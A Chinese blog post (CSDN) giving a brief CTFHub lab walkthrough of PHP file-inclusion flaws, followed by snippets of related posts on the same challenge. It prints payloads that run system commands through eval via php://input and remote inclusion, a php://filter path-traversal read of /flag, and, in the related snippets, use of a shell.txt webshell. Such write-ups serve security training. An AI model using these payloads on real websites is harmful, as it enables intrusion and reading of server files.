CTFHub靶场:文件包含

最新推荐文章于 2024-04-04 20:26:40 发布
最新推荐文章于 2024-04-04 20:26:40 发布
阅读量204 收藏 2
点赞数
分类专栏: 渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/131975654
版权
文章讨论了PHP中的文件包含漏洞,指出flag不能直接被包含,但可以通过php://input来绕过限制。提到了shell.txt文件和ctfhub密码。展示了如何使用php://filter来读取源代码,以及通过eval和system函数执行系统命令,如列出目录内容和读取特定文件。
摘要由CSDN通过智能技术生成

文件包含

题目告诉说flag不能直接被包含,但是下面有一个shell.txt,密码是ctfhub

复制URL

 

 

 

php://input

如果文件名前六个如果是:php://则执行include包含函数。

 

<?php eval(system('ls /'));?>  

<?php eval(system('cat /flag_11978'));?>

 

 远程包含

 

<?php eval(system('ls /'));?> 

<?php eval(system('cat /flag'));?>

 

读取源代码

题目中直接说 flag in/flag

所以我们直接使用 php://filter

 ?file=php://filter/resource=../../../flag

 

 

Serein_NSQ
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux常用命令精讲(基础命令介绍)
Chenwei的博文
11-17 664
文章目录 目录文章目录一、Shell二、Linux命令的分类1.查看内部命令2.禁用内部命令三、Linux命令行格式四、编辑Linux命令行的辅助操作五、获得命令帮助的方法1.pwd——查看当前的工作目录2.cd——切换工作目录(1)相对路径表现形式六、ls——列表显示目录内容ls的常用选项七、长格式Linux命令2一、alias——设置别名二、du——统计目录及文件空间占用情况三、mkdir——创建新目录四、touch——创建空文件五、ln——创建链接文件1.链接文件类型六、cp——复制文件或目录七、rm
ctfhub-文件包含
m0_62094846的博客
12-13 291
这道题和之前做的文件包含题不大一样,包含了木马 官方的wp写的很清楚文件包含 | CTFHub GET一个file,用file包含的文件会直接出现在index.php中被当作php代码解析 那么,如果file=shell.txt,就可以把木马包含进文件里了 再用蚁剑就可以连接 ...
ctfhub文件包含
diven2的博客
08-03 218
网上的都是使用hackbar进行扫描,描述的步骤也不太清晰。服务器在设置文件包含函数的时候,函数的参数没有经过过滤或者严格的定义,导致参数可以被用户自行更改,这样用户就可以包含非预知的文件,也就是一些木马或者病毒文件等。不管被包含的文件是什么类型文件,文件内的恶意代码都会被解析并执行。使用PHP写的服务器中文件包含函数有四种,include ,include_once,require,require_once。会造成服务器的网页被篡改,网站被挂马,服务器被远程控制,被安装后门等危险。
CTFHUB文件包含
最新发布
2201_75447904的博客
04-04 690
但需要注意的是,由于安全原因,大多数浏览器对file://协议有一些限制,例如不允许跨域访问、限制JavaScript执行等,以防止恶意网站利用file://协议进行攻击。而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。: 如果GET参数'file'以"php://"开头,则直接包含用户指定的文件。
文件包含ctfhub
weixin_43326436的博客
08-06 827
1.进入以后,发现的是 应该可以看到是一段代码,strpos这个函数就是查找相同字符串的位置,在这里就是查找和flag相同的字符串的位置,在下面又发现了一个我又一个链接是shell.txt,怎么使用它吗。点进去链接又是一句php,请求ctfhub意思。 2.因为是文件包含,所以直接构造payload 将?shell.txt构造, 所以直接 看到这个图片,利用火狐中的hackbar postdata 输入 ctfhub=system(‘cat /flag’); (system意思就是输出并返回最后一个sh
网络靶场:从专业赋能到实战攻防-赛博空间的对抗与演进.pdf
08-08
网空疆域的“摩擦”和影响从网络世界延展到现实世界,网络靶场从高级网安人才的专业赋能出发,通过体系化的规划、学习、演练、对抗,在实战仿真中积累经验、技术、战法,培养精英人才。打通从实战仿真到实战的壁垒,...
uploadlabs靶场文件
02-27
这个靶场可以帮助安全研究人员、开发人员以及网络安全爱好者了解和掌握如何预防和修复文件上传漏洞。 【描述】:该靶场是基于PHPStudy的LAMP(Linux、Apache、MySQL、PHP)环境搭建的。"www"目录是Apache服务器默认...
靶场:digitalworld.local: VENGEANCE
03-30
没有截图,但是有用的东西,全部都写上了 。一步一步来就能得到root。每一步都有描述,都有讲解。其中没有的部分,就没有卸载wp中,也不用操作,少走弯路。
CVE-2021-22192 靶场: 未授权用户 RCE 漏洞.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
CTFHUB 文件包含 RCE
nai_kai的博客
06-17 5891
CTFHUB 文件包含 ctfhub RCE 文件包含 write up 审计一下代码,铁铁们可以百度一下strpos()的漏洞哦 #函数查找字符串在另一字符串中第一次出现的位置(区分大小写) strpos("You love php, I love php too!","php"); “我有一个shell,怎么用?” 这个是题目给的包含文件 #request = post + get 于是构造payload,往ctfhub里传参 http://challenge-2bfb323ac5bd651f
CTFHub | 文件包含
尼泊罗河伯的博客
05-16 1251
简单分析网页显示内容中的源代码,可以发现一处代码include $_GET["file"] ,其中 include 语句可以动态地包含用户发送的GET 请求。详细的方法将在后续的内容中进行逐步解释。
文件包含————ctfhub文件包含(利用蚁剑或者eval)
qq_45655564的博客
05-29 1056
include()函数 include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,则仍按照php语法进行解析,这是include()函数所决定的。 CTFHUB文件包含 进入页面是这个样子的 <?php error_reporting(0); if (isset($_GET['file'])) { if (!strpos($_GET["file"], "flag")) {#该字符串第一次出现的位置
ctfhub文件包含:本地文件包含
luminous_you的博客
12-09 603
代码 <?php // 关闭错误报告 error_reporting(0); if (isset($_GET['file'])) { //strpos — 查找字符串首次出现的位置 if (!strpos($_GET["file"], "flag")) { include $_GET["file"]; } else { echo "Hacker!!!"; } } else { highlight_file(__FILE__); } ?&g
CTFHub-web(文件包含)
分享与记录
10-21 1988
文件包含 PHP中的strpos()函数 查找字符串在另一字符串中第一次出现的位置 PHP中的$_REQUEST 预定义的 $_REQUEST 变量包含了 $_GET、$_POST 和 $_COOKIE 的内容 $_REQUEST 变量可用来收集通过 GET 和 POST 方法发送的表单数据 $_REQUEST 变量既可以收集GET方法发送的数据,也可以接受POST方法接受的数据 题目内容: php://input php://input特点如下: 1)、Coentent-Type仅在
CTFHub】 RCE - 文件包含
cx_sam的博客
08-07 1673
CTF WEB RCE 文件包含
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 598
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
CTFHUB-RCE-文件包含
u014794539的博客
07-11 415
考点 php伪协议 file协议 分析过程 Shell是这个 使用hackbar 构造Playload传参 http://challenge-deb7e7e0db233e27.sandbox.ctfhub.com:10800/shell.txt ctfhub=system('ls /'); ctfhub=system('cat /flag'); 得到flag ctfhub{3a551fa301f8dda0dccd2c7d} php://input 考点 php伪协议 input协议 分析思路
CTFHub-Web-RCE-文件包含
qq_54037445的博客
11-29 947
文件包含,伪协议
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值